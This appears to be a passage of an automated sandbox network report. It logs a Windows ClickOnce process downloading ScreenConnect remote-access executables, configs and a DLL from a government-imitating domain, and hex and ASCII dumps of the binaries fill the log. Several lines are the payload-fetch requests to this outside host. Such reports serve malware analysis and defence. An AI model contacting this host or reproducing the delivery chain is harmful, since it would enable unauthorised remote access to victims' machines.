                                                                                                                        2024-11-13 17:18:08 UTC16384INData Raw: 85 c9 74 03 f0 ff 01 8b 88 84 00 00 00 85 c9 74 03 f0 ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40
                                                                                                                        Data Ascii: ttttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@
                                                                                                                        2024-11-13 17:18:08 UTC16384INData Raw: 59 06 83 c0 18 03 c1 85 db 74 1b 8b 7d 0c 8b 70 0c 3b fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45
                                                                                                                        Data Ascii: Yt}p;rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UE
                                                                                                                        2024-11-13 17:18:08 UTC16384INData Raw: 67 00 62 00 00 00 64 00 61 00 2d 00 64 00 6b 00 00 00 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d
                                                                                                                        Data Ascii: gbda-dkde-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-
                                                                                                                        2024-11-13 17:18:08 UTC13826INData Raw: a0 32 b6 32 cc 32 e3 32 ea 32 f6 32 09 33 0e 33 1a 33 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04
                                                                                                                        Data Ascii: 2222223333033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.449750185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:09 UTC108OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        2024-11-13 17:18:09 UTC234INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 61208
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:09 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:09 UTC16150INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 63 2b 80 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 b8 72 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc+"0 @ r@
                                                                                                                        2024-11-13 17:18:09 UTC16384INData Raw: 16 00 7a 16 7f 0e 16 00 58 0d 87 0e 36 00 6d 08 8f 0e 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d
                                                                                                                        Data Ascii: zX6m"`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
                                                                                                                        2024-11-13 17:18:09 UTC16384INData Raw: 61 72 63 68 42 6f 78 49 6e 70 75 74 4c 65 6e 67 74 68 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d
                                                                                                                        Data Ascii: archBoxInputLengthThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParam
                                                                                                                        2024-11-13 17:18:09 UTC12290INData Raw: 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3c 00 0c 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 33 00 2e 00 37 00 2e 00 39 00 30 00 36 00 37 00 00 00 40 00 0c 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 33 00 2e 00 37 00 2e
                                                                                                                        Data Ascii: ScreenConnect.WindowsBackstageShell.exe<ProductNameScreenConnect<ProductVersion24.3.7.9067@Assembly Version24.3.7.


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.449752185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:10 UTC112OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        2024-11-13 17:18:10 UTC232INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 266
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:10 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:10 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.449754185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:11 UTC107OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        2024-11-13 17:18:12 UTC232INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 266
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:11 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:12 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.449755185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:13 UTC115OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        2024-11-13 17:18:13 UTC232INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 266
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:13 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:13 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.449757185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:14 UTC129OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-11-13 17:18:14 UTC234INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 81688
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:14 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:14 UTC16150INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7f da 6f e6 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 d5 24 02 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELo"0@^ `@ `$@
                                                                                                                        2024-11-13 17:18:14 UTC16384INData Raw: 00 29 01 00 24 39 37 33 35 31 30 64 62 2d 37 64 37 66 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 21 b6 ed 55 cc 1c 34 da a9 ba 26 c5 af c0 7a 8b c8 ec 9a 4e 15 f5 57 09 66 f8 54 1e 23 0d 46 8a d0 31 74 fa b5 ce cc c5 f3 48 33 d0 24 1c da b9 2c fd 8f cc 64 34 db dc 2b 01 3d 74 17 8f 7b 58 b2 b0 ad de f3 c1 b0 0d c4 c8 95 65 a5 c1 77 fc 36 28 c5 9d 46 a0 37 b1 94 f6 c6 b6 ea 45 c4 0a 6b d7 09 51 69 f7 bb fd d8 20 8a 15 e8 de 50 11 27 69 e2 f0 72 86 af 63 b6 44 86 66 ff d7 59 27 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: )$973510db-7d7f-452b-8975-74a85828d354TextState!U4&zNWfT#F1tH3$,d4+=t{Xew6(F7EkQi P'ircDfY'{^@
                                                                                                                        2024-11-13 17:18:14 UTC16384INData Raw: f8 ff 52 ce fa ff 53 d0 fd ff 54 d1 fe ff 54 d2 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52
                                                                                                                        Data Ascii: RSTTUUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQR
                                                                                                                        2024-11-13 17:18:14 UTC16384INData Raw: ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67
                                                                                                                        Data Ascii: fffffffffffffffffffggggggggggggggggggggggggggggggggggggggg
                                                                                                                        2024-11-13 17:18:14 UTC16384INData Raw: 00 00 00 00 00 00 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: n
                                                                                                                        2024-11-13 17:18:14 UTC2INData Raw: 00 00
                                                                                                                        Data Ascii:


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        8192.168.2.449760185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:15 UTC94OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        2024-11-13 17:18:15 UTC236INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 1721856
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:15 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:15 UTC16148INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 79 16 02 e0 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 7e 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 38 00 1b 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELy" 0>~] ` 8@
